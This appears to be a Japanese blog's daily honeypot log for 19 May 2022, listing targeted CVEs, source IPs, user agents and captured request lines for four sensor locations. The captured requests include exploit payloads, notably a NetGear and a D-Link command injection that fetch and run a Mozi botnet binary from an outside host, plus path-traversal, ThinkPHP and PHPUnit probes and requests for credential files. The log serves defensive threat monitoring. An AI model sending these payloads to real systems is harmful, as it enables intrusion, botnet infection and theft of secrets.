2022/05/19 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/05/19分です。

特徴

共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

Location:JP

Lkx-TraversalHttpPluginによるスキャン行為
l9exploreによるスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:US

GPONルータの脆弱性を狙うアクセス

を確認しました。

Location:UK

.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:SG

NetGear製品の脆弱性を狙うアクセス
.jsへのスキャン行為

を確認しました。

他

アクセス数推移

JP：総アクセス数：85 (前日比：10)
US：総アクセス数：49 (前日比：4)
UK：総アクセス数：32 (前日比：-18)
SG：総アクセス数：62 (前日比：-1)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
16	95.214.235.205	Ukraine
1	104.131.52.168	United States
1	104.131.95.139	United States
1	104.131.95.165	United States
4	135.125.217.54	France
7	135.125.246.110	France
2	143.198.51.237	United States
15	143.198.136.88	United States
1	144.91.83.245	Germany
7	149.56.234.155	Canada
1	172.104.138.223	United States
1	185.54.228.26	Slovakia
1	185.56.80.65	Seychelles
8	185.254.196.217	Ukraine
1	192.241.221.11	United States
11	193.106.191.48	Russia
1	205.210.31.156	United States
6	212.192.246.130	Czechia

UserAgent一覧

件数	UserAgent
9	`-`
3	`Go-http-client/1.1`
1	`Lkx-TraversalHttpPlugin/0.0.1 (+https[:]//leakix[.]net/, +https[:]//twitter[.]com/HaboubiAnis)`
1	`Mozila/5.0`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36`
7	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
40	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
10	`l9explore/1.3.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_18.179.20.5_80\n`
2		`\x16\x03\x01`
1	CONNECT	`leakix[.]net:443`	HTTP/1.1
1	GET	`/.DS_Store`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.env.bak`	HTTP/1.1
41	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`//MyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`//myadmin/scripts/setup.php`	HTTP/1.1
1	GET	`//phpMyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`//phpmyadmin/scripts/setup.php`	HTTP/1.1
1	GET	`//pma/scripts/setup.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/api/geojson?url=file:///etc/hosts`	HTTP/1.1
1	GET	`/api/search?folderIds=0`	HTTP/1.1
1	GET	`/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts`	HTTP/1.1
1	GET	`/config/aws.yml`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fuN3`	HTTP/1.0
1	GET	`/idx_config/`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/login.action`	HTTP/1.1
1	GET	`/muieblackcat`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PUT	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	13.66.227.75	United States
1	15.204.25.44	United States
2	45.227.254.51	Belize
6	51.79.29.48	Canada
1	82.151.125.111	Russia
1	104.131.52.168	United States
1	104.131.95.139	United States
1	104.131.95.142	United States
2	109.237.103.9	Russia
1	143.198.51.237	United States
3	144.91.83.245	Germany
1	147.124.217.39	United States
1	162.142.125.222	United States
1	165.227.109.10	United States
1	167.94.138.44	United States
1	167.248.133.45	United States
9	185.254.196.223	Ukraine
2	193.56.29.26	United Kingdom
1	193.56.29.223	United Kingdom
11	193.106.191.48	Russia
1	198.235.24.15	United States

UserAgent一覧

件数	UserAgent
8	`-`
3	`Mozila/5.0`
3	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
23	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`\x03`
1		`\x16\x03\x01\x01D\x01`
1		`\x16\x03\x01`
25	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=user&psd=user`	HTTP/1.0
1	GET	`/console/`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
3	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.62.58.30	United Kingdom
1	20.55.34.113	United States
1	45.134.140.3	United Kingdom
1	45.141.157.180	Bulgaria
2	45.227.254.53	Belize
1	54.167.198.238	United States
1	85.113.44.207	Russia
1	103.60.60.186	Singapore
2	104.40.241.213	United States
2	109.237.103.118	Russia
1	115.48.130.244	China
1	144.91.83.245	Germany
2	157.230.216.203	United States
1	162.142.125.213	United States
1	192.241.212.79	United States
11	193.106.191.48	Russia
1	198.235.24.29	United States
1	222.138.164.126	China

UserAgent一覧

件数	UserAgent
12	`-`
1	`Mozila/5.0`
1	`Mozilla/5.0 (Linux; Android 11; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.58 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 5.1.1; A37f) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
3	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 Gecko/20100101`
1	`python-requests/2.22.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`MGLNDD_132.145.66.34_80\n`
2		`\x03`
1		`\x16\x03\x01\x01D\x01`
2		`\x16\x03\x01`
1	GET	`/.aws/credentials`	HTTP/1.1
3	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/phpmyadmin/index.php`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
2	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.62.58.30	United Kingdom
1	20.97.195.80	United States
1	35.88.164.206	United States
11	51.79.29.48	Canada
1	103.133.105.220	Vietnam
1	104.131.59.117	United States
1	104.131.95.137	United States
2	104.131.95.139	United States
2	109.237.103.9	Russia
2	109.237.103.123	Russia
1	116.75.215.121	India
1	125.125.214.28	China
1	143.198.51.237	United States
2	144.91.83.245	Germany
4	154.88.26.220	Seychelles
1	162.142.125.211	United States
1	178.128.251.158	United States
2	185.174.101.31	Ukraine
1	185.220.101.36	Germany
8	185.254.196.223	Ukraine
2	188.165.174.154	France
11	193.106.191.48	Russia
2	194.165.16.73	Panama
1	198.235.24.133	United States
1	223.130.30.73	India

UserAgent一覧

件数	UserAgent
10	`-`
3	`Go-http-client/1.1`
2	`Mozila/5.0`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
30	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$`	HTTP/1.0
2		`\x03`
2		`\x16\x03\x01\x01D\x01`
2		`\x16\x03\x01`
30	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/administrator/help/en-GB/toc.json`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
2	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//125[.]125[.]214[.]28:38678/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/wp-includes/js/jquery/jquery.js`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
2	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PRI	`*`	HTTP/2.0